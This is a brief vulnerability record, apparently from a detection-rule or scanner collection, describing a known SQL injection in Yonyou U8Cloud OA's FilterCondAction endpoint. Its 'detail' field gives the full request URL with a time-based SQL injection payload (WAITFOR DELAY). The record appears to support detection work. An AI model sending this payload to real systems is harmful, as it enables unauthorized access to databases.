vendor = "用友"
name = "用友OA系统U8Cloud FilterCondAction SQL注入"
type = "SQL注入"
version = "未知"
path = "/service/~iufo/com.ufida.web.action.ActionServlet"
detail = "/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.bi.report.rep.FilterCondAction&method=execute&repID=1%27);WAITFOR+DELAY+%270:0:5%27--"
fix = "缺省规则可检出"
date = "0719"
label = "nday"
verifier = "AdySec"
